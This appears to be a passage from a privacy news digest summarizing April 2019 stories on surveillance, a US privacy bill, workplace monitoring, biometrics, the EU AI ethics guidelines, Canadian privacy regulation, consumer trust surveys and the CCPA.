Amid a growing belief that the program has become a logistical quagmire and provides limited national security benefit, the U.S. National Security Agency has recommended that the White House abandon a surveillance program that collects data from U.S. phone calls and text messages. Legal compliance issues halted the use of the phone-records program earlier this year, but it is ultimately up to the White House to push for legislation that would renew the program. Meanwhile, members of intelligence agencies belonging to the Five Eyes, including agencies across Australia, Canada, New Zealand, the U.K. and U.S., are expected to make their first joint public appearance to discuss their collaboration at this week’s CyberUK conference in Glasgow, Scotland. [WSJ.com]

US Legislation

US – Lawmakers Struggle to Draft Online Privacy Bill

U.S. lawmakers drafting a bill to create rules governing online privacy hope to have a discussion draft complete by late May with a Senate committee vote during the summer and are intensifying efforts, but disputes are likely to push that timetable back, according to sources knowledgeable about the matter. Democrat Senators Richard Blumenthal, Brian Schatz and Maria Cantwell, who are leading the effort to draft the measure along with Republican Senators Jerry Moran, Commerce Committee chairman Roger Wicker and the Senate’s No. 2 Republican, John Thune, met late Tuesday for 45 minutes in Thune’s Capitol Hill office to discuss the status of the effort and look at issues where senators do not agree and will need to negotiate to resolve. They could meet again as early as next week. “We’re in the early stages,” Thune said. For a big legislative undertaking he said he thought the group was in a “pretty good place” but acknowledged it is “not an easy lift” to win agreement. The U.S. Senate Committee on Commerce, Science and Transportation will hold a hearing on the matter on Wednesday [notice and detailse — the committee also met on Tuesday for a hearing titled “Strengthening the Cybersecurity of the Internet of Things” see notice & watch]. One dispute that has arisen is whether consumers whose privacy is violated by a company should be allowed to sue that company, with Democrats pushing for this to be allowed, according to one of the sources familiar with the discussions. At least one key Republican disagrees. “Senator Moran has heard serious concerns from the business community, particularly the small business community, that any private right of action would have serious ramifications in their sustainability. The senator is taking these considerations into account as he negotiates federal privacy legislation,” said a representative for the senator in an email statement. Democrat support for the privacy legislation is key since the measure will also have to pass the U.S. House of Representatives, which Democrats control, to become law. Republicans have a majority in the Senate. A privacy bill is one of the few pieces of potential legislation that lobbyists believe has a decent chance of becoming law because it is a bipartisan concern and does not cost taxpayers money, according to a source following the matter. [Reuters]

Workplace Privacy

WW – Study: 61% of Employees Share Sensitive Info Via Email

Igloo Software’s “2019 State of the Digital Workplace“ report finds 61% of employees share sensitive information via email. The company polled 2,000 employees at companies with more than 250 staff members for the study. Other findings include 28% of respondents who said they use instant messaging to deliver sensitive or private information and 66% who revealed they use non-approved communication apps in order to avoid tracking. [ZDNet]

US – Employers Continue Efforts to Monitor Staff in the Workplace

CNBC reports on the continued rise of employers monitoring their staff in the workplace and whether privacy laws offer any protection from the practices. A 2018 Gartner study found 22% of companies around the world use employee-movement data, 17% monitor work-computer use, and 16% examine Microsoft Outlook and calendar data. Amazon recently received a patent to detect warehouse workers’ location, while Walmart patented a system to listen in on their employees and customers. “Employees are in a difficult position. As more and more consumer privacy laws take shape, we’ve seen that there’s been a concern from companies that those privacy laws don’t apply to employees,” Electronic Frontier Foundation Senior Staff Attorney Lee Tien said. [CNBC]

 

+++

 

 

1-15 April 2019

Biometrics

AU – Committee Calls for Transparency over Australia’s Face-Matching Service

Australia’s Parliamentary Joint Committee on Law Enforcement has asked the government to be more transparent regarding plans to allow state and territory law enforcement access to the country’s face-matching service. In a report examining the impact of new and emerging information and communication technology, the committee called for safeguards that would protect against data breaches and urged the government to consider its recommendations for future strategies for biometric data and facial-recognition systems. [ZDNet]

US – Early Attempts at New York Driver Facial Recognition Fail

New York’s first attempts at employing facial recognition on its highways were unsuccessful. The Metropolitan Transportation Authority installed recognition software on the Robert F. Kennedy Bridge, which links Manhattan, the Bronx and Queens, last year and revealed in November that the technology “failed with no faces (0%) being detected within acceptable parameters” during its initial test period. The software’s pilot program and its evaluation are ongoing, according to the MTA. The poor results only fuel civil rights campaigners’ concerns over privacy and the technology’s inaccuracies, while New York Civil Liberties Union Technologist Daniel Schwarz says the software is “pervasive, real-time surveillance of everyone passing by.” [The Wall Street Journal]

EU – CNIL Adopts Model Regulation on Employers’ Use of Biometrics

After a public consultation, France’s data protection authority, the CNIL, has adopted the model regulation “biometrics in the workplace.” [English translation & notice in French & English translation – also see CNIL’s FAQ & English translation]. The CNIL’s model regulation states companies can install “biometric access control devices” as long as they comply with the agency’s rules. Organizations must be able to justify their use of biometric data and also follow obligations listed out in the EU General Data Protection Regulation. Employers must document any decisions they make with biometric devices, while data controllers are mandated to conduct a data protection impact assessment. The CNIL has set up a frequently asked questions page to help companies follow the new requirements. [CNIL.fr | Privacy & Information Security Law Blog (HuntonAndrewsKurth) | CNIL sets rules for biometric employee time and attendance systems in France]

Big Data / Analytics / Artificial Intelligence

US – AI Researchers Ask Amazon to Stop Selling Facial-Recognition Tech to Law Enforcement

A group of artificial intelligence researchers has asked Amazon to no longer sell facial-recognition technology to law enforcement. Researchers from Google, Facebook, Microsoft and several universities around the world signed a letter addressed to Amazon. The researchers state Amazon’s facial-recognition technology has been shown to have higher error rates when used on women and people of color. The letter also addressed points made by Amazon Web Services General Manager of Artificial Intelligence Matt Wood and AWS Vice President of Global Public Policy Michael Punke. [NY Times]

EU – European Commission Releases Final Ethics Guidelines for Trustworthy AI

On April 8, 2019, the European Commission High-Level Expert Group (the “HLEG“) on Artificial Intelligence released the final version of its Ethics Guidelines for Trustworthy AI [see PR, notice]. The Guidelines’ release follows a public consultation process in which the HLEG received over 500 comments on its initial draft version. The Guidelines outline a framework for achieving trustworthy AI and offer guidance on two of its fundamental components: A) that AI should be ethical; and B) that it should be robust, both from a technical and societal perspective. The Guidelines intend to go beyond a list of principles and operationalize the requirements to realize trustworthy AI. The Guidelines consist of three chapters: 1) outlines ethical principles and values that must be respected in the development, deployment and use of AI systems; 2) details seven requirements that AI should meet to ensure it is trustworthy (i.e., human agency and oversight; technical robustness and safety; privacy and data governance; transparency; diversity, non-discrimination and fairness; environmental and societal well-being; and accountability); and 3) sets out a trustworthy AI assessment list reflecting Chapter II’s requirements. The list is non-exhaustive and intended to apply in a flexible manner depending on the AI use at hand. The HLEG plans to launch a pilot test phase based on its trustworthy AI assessment list which will involve a range of stakeholders, including industry, research institutes and public authorities. Interested organizations can sign up to the European AI Alliance to be notified when the pilot commences. Early next year, following the pilot, the HLEG will review any feedback it receives and revise the list as appropriate. [Privacy & Information Security Law Blog (Hunton Andrews Kurth) | How the EU’s AI ethics guidelines will impact US businesses | The EU releases guidelines to encourage ethical AI development | AI systems should be accountable, explainable, and unbiased, says EU]

Canada

CA – OPC Signals Major Change on Cross-Border Data Transfers

Faced with a decades-old private-sector privacy law [PIPEDA: see OPC Guidance] The Office of the Privacy Commissioner of Canada (OPC) has embarked on a dramatic reinterpretation of the law premised on incorporating new consent requirements. The strained interpretation arose when the OPC released a consultation paper signalling a major shift in its position on cross-border data transfers. Canadian privacy law has long relied on an “accountability principle” to ensure that organizations transferring personal information across borders to third parties are ultimately responsible for safeguarding that information. That enabled Canadian companies to outsource data-processing activities to other jurisdictions so long as they used contractual provisions to guarantee appropriate safeguards. The federal privacy commissioner seems ready to reverse that long-standing approach. The OPC position is a preliminary one – the office is accepting comments in a consultation until June 4 – however there are distinct similarities with its attempt to add the right to be forgotten into Canadian law [see Geist’ contrary opinion]. Despite the absence of a right-to-be-forgotten principle in the statute, the OPC simply ruled that it was reading in a right to de-index search results into PIPEDA. [OPC PR & position paper] That issue is currently being challenged before the courts. In this case, the absence of meaningful updates to Canadian privacy law for many years has led to another exceptionally aggressive interpretation of the law by the OPC, effectively seeking to update the law through interpretation rather than actual legislative reform. While the OPC believes its position is consistent with Canada’s international trade obligations. The Comprehensive and Progressive Trade Agreement for Trans-Pacific Partnership (CPTPP) features a commitment to allow cross-border transfers of information by electronic means. It limits restrictions on the open-border principle for data transfers, stipulating that any limitations may not be arbitrary, discriminatory or a disguised restriction on trade. Moreover, any limits cannot be greater than those required to achieve a legitimate policy objective. The Canada-U.S.-Mexico Agreement contains similar language. The imposition of consent requirements for cross-border data transfers could be regarded as a non-tariff barrier to trade that impose restrictions greater than those required to achieve the objective of privacy protection especially given that PIPEDA has long been said to provide such protections without the need for this additional consent regime. [The Globe and Mail | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing]

CA – OPC, Chief Electoral Officer Release Guidance on Political Party Data Protection

On April 1 the federal privacy commissioner Daniel Therrien and chief electoral officer Stéphane Perrault advised Canada’s federal political parties to play it straight with the personal information of voters they hold [see Guidance for federal political parties on protecting personal informationPR] They issued the guidance because the Trudeau government refuses to mandate federal parties to follow privacy law. Instead, under recent changes to the Canada Elections Act [see amendment bill & some guidance] — which came into effect— federal political parties have to declare specific privacy policies they will follow. Those policies have to be approved by Elections Canada by July 1. The guidance is summarized in four points: 1) Be transparent by clearly explaining what personal information will be used for, whether it will be shared with others and for what purpose; 2) Obtain meaningful consent for the collection, use and disclosure of personal information and only use the information for purposes individuals have consented to. For example, parties should not assume consent to add personal information collected through social media to party databases simply when people interact with a party by liking a post on social media; 3) Provide individuals with access to their information and the opportunity to correct it; and 4) Keep personal information only as long as necessary to satisfy the purposes for which it was collected, and then destroy the information securely. For example, information collected for a specific petition or cause should not be reused for general political messaging. The guidance also includes a list of six obligations imposed on federal parties under the new elections law and some questions party officials might ask themselves to see if they meet those duties. As an extra aid the guidance includes a list of best practices for protecting information. [IT World Canada | Federal parties urged to bolster privacy protections beyond what the law requires ahead of 2019 election | New privacy guidelines issued for political parties in wake of blanket text messages | Canada’s political parties should respect citizen’s privacy rights, watchdog says | Can politicians send you unsolicited text messages? Here are the rules in Canada]

CA – OIPC NU: Nunavut Government Now Less Responsive to Info-Privacy Law

Elaine Keenan Bengts, Nunavut’s information and privacy commissioner told the legislative assembly’s Standing Committee on Government Oversight and Public Accounts on April 11 that she’s seen a decline in how well territorial public bodies are following the territory’s Access to Information and Protection of Privacy Act. Over her 18 years as commissioner, Elaine Keenan Bengts said Government of Nunavut agencies have been largely responsive to the act. But she’s seen a shift in recent years: fewer are meeting deadlines or responding to her recommendations. The hearings focused largely on the information and privacy commissioner’s most recent report, from 2017-18, which outlines the 26 reviews issued by her office over that period. Of those 26 reviews, 19 did not receive a response from the appropriate department within their 30-day timeline, Keenan Bengts said. “In only five of the 21 reviews in which I received a response were my recommendations accepted,” she said. “Until a few years ago, I would estimate about 90% of my recommendations were accepted.” Nunavut’s Department of Culture and Heritage had the largest number of requests for reviews, all of them stemming from a single applicant who had filed access to information requests related to the discovery of the Franklin expedition ships. “I probably wrote 20 letters to the minister himself, asking that he respond, time and time again. I got some responses some of the time,” Keenan Bengts told the hearing. “Most often, I got no response whatsoever.” According to Bengts “There have been a number of breaches” Privacy tends to be violated more easily in smaller communities, Keenan Bengts said, giving the example of a serious health information breach her office investigated where an individual went to their local landfill and recovered a Department of Health hard drive that included medical information from a number of people in the community. In another privacy breach her office investigated, credentials meant to be assigned to a new Department of Health employee were mistakenly assigned to a Department of Justice employee with a similar name. The error went unnoticed by the GN for six months. “The Justice employee was regularly going through the medical records” she said 43 Government of Nunavut departments, agencies and corporations fall under its Access to Information and Protection of Privacy Act. That will change soon. The act was amended in 2017 to allow for municipalities and education authorities to become public bodies under the act, which would make them subject to that legislation. But Keenan Bengts warns that those organizations will all need training and resources before they are ready to meet their obligations under the act. Nunavut is also the only jurisdiction in Canada that doesn’t have health-specific privacy legislation, an issue the Department of Health said it intends to start work on soon. Bengts’ term as information and privacy commissioner comes to end in March 2020, when she intends to retire. [ Nunatsiaq News |

Consumer

US – Consumers Express Privacy Concerns, but Actions Say Otherwise

While consumers have said they are concerned about their privacy, studies have shown they have not taken steps to help themselves. A PricewaterhouseCoopers study found 92% of consumers said they should have control over their data, and 71% said they would no longer conduct business with an organization that shared their information without consent. However, an IBM survey found only 45% updated their privacy settings after a data breach, and 16% no longer interacted with a compromised organization. “People say they’re worried, but they don’t vote with their fingers, so to speak,” said PwC Cybersecurity and Privacy Principal Jay Cline. Meanwhile, an Integris Software study found 79% of companies support a federal U.S. privacy law, but only 23% are ready for the California Consumer Privacy Act, and 36% are compliant with the EU General Data Protection Regulation.” [Axios]

US – Surveys: US Consumers Lack Trust When Sharing Data

Studies by the Dentsu Aegis Network and Clever Real Estate reveal U.S. consumers are not confident firms can protect their data. Dentsu polled 43,000 people globally for “The Digital Society Index 2019: Human Needs in a Digital World,” which found 41% of U.S. consumers have faith in companies’ data protection capabilities, while 75% of U.S. consumers would stop doing business with a firm that misused their data. Clever Real Estate surveyed 1,139 Americans, finding that 95% have privacy concerns with their social media accounts. Privacy issues on Facebook concerned 80% respondents, while 86% have decided to share data with a website or app based on its look. [MediaPost]

US – Poll: Americans Do Not Trust Tech Companies, Federal Government with Data Protection

A recent survey shows a majority of Americans lack confidence in the federal government and tech companies’ data protection capabilities. The joint poll of 1,000 American adults by the WSJ and NBC News reveals skepticism regarding data safety with Amazon, Google and Facebook, as well as the U.S. government. At least 75% of those surveyed either have no trust or limited trust in any of the four entities. Facebook has the least credibility among respondents as it generated only 6% confidence. The poll also shows 54% of Americans seek more federal regulation and oversight of social media companies, and 90% said that sharing or selling access to a consumer’s personal information should require user permission. [The Wall Street Journal]

US – Services Analyze Consumer Data to Determine Trustworthiness Score

The Wall Street Journal reports on the use of fraud detection service companies. One such company, Sift, helps establish a trustworthiness score and determine whether an entity is interacting with a bot or risky human. In many ways, Sift compiles a score similar to a credit score, loading and evaluating consumers’ personal data, the only difference being the consumer has no way of accessing their Sift score. While Sift and others claim to be compliant with privacy regulations, including the EU General Data Protection Regulation, the article points out, “In the gap between who is taking responsibility for user data — Sift or its clients — there appears to be ample room for the kind of slip-ups that could run afoul of privacy laws.” [The Wall Street Journal]

Education

US – New CCPA Rules for Privacy in the Education Sector

The California Consumer Privacy Act (CCPA) will become effective January of 2020 and may impact companies in the education sector, including the larger education technology companies. The CCPA applies to for-profit businesses that collect the personal information of California consumers, and meets at least one of the following criteria: a) annual gross revenue over US$25 million; b) buys, receives, sells, or shares the data of over 50,000 California residents annually for commercial purposes; or c) derives over 50% of its annual revenue from selling consumer information. The CCPA also applies to service providers that process consumer information on behalf of qualifying business entities. While the CCPA does not apply to non-profit educational institutions, it may apply to certain for-profit educational institutions, third-party service providers, and others in the education space. If an educational entity meets the threshold requirements or it processes information on behalf of such an entity, it should prepare for CCPA. Regulated educational entities should be wary of the following key requirements of the CCPA: 1) Maintain public disclosure that outline the rights listed in the CCPA and the categories of personal information that are collected, sold, or disclosed for business purposes (e.g., a for-profit university would post a disclaimer on its website that it purchases phone numbers of prospective students); 2) Allow consumers to receive information detailing what personal information has been collected, sold, or disclosed by the business in question (e.g., if requested by a student, an online program management (OPM) provider would disclose to students that it has distributed student email addresses to partner institutions); 3) Delete consumers’ personal information upon request, subject to a number of exceptions (e.g., a for-profit computer programming “boot camp” would delete a student’s mailing address from its database after a request is sent); and 4) Allow consumers to opt out of the sale of personal information (e.g., a for-profit university would place a “do not sell my personal information” link on its homepage). Once in effect, the California attorney general’s office will have jurisdiction over enforcement. Businesses have 30 days to cure alleged violations, if these are not cured, then the attorney general’s office can levy civil penalties of up to US$7,500 per intentional violation. Moreover the CCPA authorizes a limited private right of action for consumers whose personal information is subject to unauthorized disclosure. [Chronicle of Data Protection (Hogan Lovells)]

Government

US – Hackers Targeted Election Systems in All 50 States in 2016

A Joint Intelligence Bulletin issued by the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) to state and local authorities said that hackers targeted election systems in all 50 states during the 2016 election cycle. The bulletin says that “the FBI and DHS assess that Russian government cyber actors probably conducted research and reconnaissance against all US states’ election networks leading up to the 2016 Presidential elections.” [arstechnica.com: DHS, FBI say election systems in all 50 states were targeted in 2016]

Encryption

US – Encryption Use Increases to Address Compliance Requirements

The use of trusted cryptography to protect their applications and sensitive information is at an all-time high. According to the 2019 Global Encryption Trends Study from nCipher Security, the Ponemon Institute, this year, 45% of respondents say their organization has an overall encryption plan applied consistently across the entire enterprise with a further 42% having a limited encryption plan or strategy that is applied to certain applications and data types [see PR